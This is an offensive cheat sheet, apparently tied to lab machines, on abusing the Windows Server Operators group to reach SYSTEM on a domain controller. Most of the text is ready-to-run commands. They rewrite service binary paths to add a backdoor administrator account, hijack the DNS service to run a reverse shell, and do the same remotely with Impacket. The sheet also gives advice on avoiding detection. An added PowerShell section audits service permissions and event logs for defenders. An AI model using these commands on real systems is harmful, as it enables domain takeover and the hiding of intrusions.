Server Operators Abuse

# Overview

The Server Operators group grants members the ability to start, stop, and configure services on domain controllers. This includes modifying service binary paths, which can be leveraged to execute arbitrary code as SYSTEM. On domain controllers, this effectively grants domain admin equivalent privileges.

# Prerequisites

  • Membership in the Server Operators group (or equivalent service control permissions)
  • Ability to modify service configuration

# Detection & Enumeration

```cmd
:: Check group membership
whoami /groups | findstr /i "Server"

:: List services and their permissions
sc query state= all

:: Check if you can modify a specific service
accesschk.exe /accepteula -uwcqv "Server Operators" *

:: Check specific service permissions
sc sdshow <ServiceName>
```

# Using PowerUp for Service Enumeration

```powershell
Import-Module .\PowerUp.ps1
Get-ServiceUnquoted
Get-ModifiableService
Get-ModifiableServiceFile
```

# Exploitation / Execution

# Modify Service Binary Path

```cmd
:: Check current service configuration
sc qc <ServiceName>

:: Modify the service binary path to run a command
sc config <ServiceName> binPath= "cmd.exe /c net user hacker P@ssw0rd! /add && net localgroup Administrators hacker /add"

:: Or use a reverse shell
sc config <ServiceName> binPath= "cmd.exe /c C:\temp\reverse_shell.exe"

:: Start the service to execute
sc start <ServiceName>

:: Revert the service path to original (cleanup)
sc config <ServiceName> binPath= "C:\Original\Path\service.exe"
```

# Service-Based Privilege Escalation on DC

```cmd
:: If Server Operators on a Domain Controller
:: Modify the DNS service (commonly present on DCs)
sc config DNS binPath= "cmd.exe /c C:\temp\reverse_shell.exe"

:: Start the service
sc start DNS

:: Alternative: create a new service
sc create privesc binPath= "C:\temp\reverse_shell.exe" start= demand
sc start privesc
```

# Using Service Control from Remote

```bash
# Using Impacket's services.py
impacket-services.py 'domain.local/svc_operator:password@10.10.10.10' -action change -name DNS -display "DNS Server" -path "C:\temp\shell.exe"

# Start the service
impacket-services.py 'domain.local/svc_operator:password@10.10.10.10' -action start -name DNS
```

# Common Pitfalls

  • ⚠️ The service binary path has a 256-character limit — keep payloads short
  • ⚠️ Some services restart automatically or are monitored — choose a service that won't attract attention
  • ⚠️ Service execution runs in Session 0 (non-interactive) — GUI programs won't display windows
  • ⚠️ The binPath= parameter in sc config requires a space after the equals sign but NOT before it
  • ⚠️ After exploitation, always revert the service path to its original value to avoid detection

# OPSEC Considerations

  • 🛡️ Service configuration changes generate Event ID 7040 (service start type change) and 4697 (service installation)
  • 🛡️ Service start generates Event ID 7036 (service state change)
  • 🛡️ Modifying a well-known service (like DNS on a DC) may trigger alerts in SIEM
  • 🛡️ Creating new services is more suspicious than modifying existing ones
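The following is an added defender-side check, not code from the module or from the tools it lists. It ties the `sc sdshow` enumeration above to the event IDs in this section: it lists which services actually grant Server Operators (SDDL alias `SO`, SID S-1-5-32-549) change-config or start rights, flags service binary paths that look like a modified `binPath=`, and pulls the recent service events. The function names are made up for this example; it assumes an elevated PowerShell session on the DC with `sc.exe` on the PATH.

```powershell
# Added example (not from the module). Run elevated on the DC; sc.exe must be on PATH.
# Service SDDL right codes worth reviewing when granted to Server Operators
# (alias SO / S-1-5-32-549): DC = SERVICE_CHANGE_CONFIG, RP = SERVICE_START,
# WD = WRITE_DAC, WO = WRITE_OWNER, GA = GENERIC_ALL.
$reviewRights = 'DC', 'RP', 'WD', 'WO', 'GA'

function Get-ServerOperatorServiceRights {
    foreach ($svc in Get-Service) {
        $sddl = (& sc.exe sdshow $svc.Name 2>$null) -join ''
        $aces = [regex]::Matches($sddl, '\(A;[^;]*;([^;]*);[^;]*;[^;]*;(?:SO|S-1-5-32-549)\)')
        foreach ($ace in $aces) {
            # Rights are concatenated two-letter codes; split in pairs so "SDCC" is not read as "DC"
            $rights = $ace.Groups[1].Value
            $codes  = for ($i = 0; $i + 1 -lt $rights.Length; $i += 2) { $rights.Substring($i, 2) }
            $hits   = @($codes | Where-Object { $_ -in $reviewRights })
            if ($hits.Count -gt 0) {
                [pscustomobject]@{ Service = $svc.Name; ServerOperatorRights = ($hits -join ',') }
            }
        }
    }
}

# Services whose binary path runs a shell/script host or lives outside the usual
# install roots: the shape a rewritten binPath from this module would take.
function Get-SuspiciousServicePaths {
    $shellHosts   = 'cmd\.exe|powershell\.exe|pwsh\.exe|cscript\.exe|wscript\.exe|mshta\.exe|rundll32\.exe'
    $trustedRoots = @($env:SystemRoot, $env:ProgramFiles, ${env:ProgramFiles(x86)}) | Where-Object { $_ }
    Get-CimInstance Win32_Service | Where-Object { $_.PathName } | ForEach-Object {
        $path      = $_.PathName
        $inTrusted = @($trustedRoots | Where-Object { $path -like "*$_*" }).Count -gt 0
        if ($path -match $shellHosts -or -not $inTrusted) {
            [pscustomobject]@{ Service = $_.Name; RunsAs = $_.StartName; State = $_.State; PathName = $path }
        }
    }
}

# Recent service events. 7045 (System log, new service installed) is added to the
# IDs listed above; 4697 is in the Security log and needs "Audit Security System Extension".
function Get-RecentServiceEvents ([int]$Hours = 24) {
    $since   = (Get-Date).AddHours(-$Hours)
    $filters = @{ LogName = 'System'; Id = 7036, 7040, 7045; StartTime = $since },
               @{ LogName = 'Security'; Id = 4697; StartTime = $since }
    foreach ($f in $filters) {
        Get-WinEvent -FilterHashtable $f -ErrorAction SilentlyContinue |
            Select-Object TimeCreated, Id, @{ n = 'Summary'; e = { ($_.Message -split "`r?`n")[0] } }
    }
}

Get-ServerOperatorServiceRights | Format-Table -AutoSize
Get-SuspiciousServicePaths      | Format-Table -AutoSize
Get-RecentServiceEvents         | Format-Table -AutoSize
```

The path check is a review list rather than a verdict: compare its output against a baseline of the DC's services, since legitimate software can install outside the trusted roots.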

# Post-Exploitation Value

Server Operators on a domain controller provides a direct path to SYSTEM, which on a DC means domain admin equivalent. This can be chained with DCSync to dump all domain hashes.

# Tool References

| Tool | Link |
|---|---|
| PowerUp | https://github.com/PowerShellMafia/PowerSploit |
| accesschk | https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk |
| Impacket services | https://github.com/fortra/impacket |

# Source Machines

  • Support (Easy, Windows)
  • Flight (Medium, AD/Windows)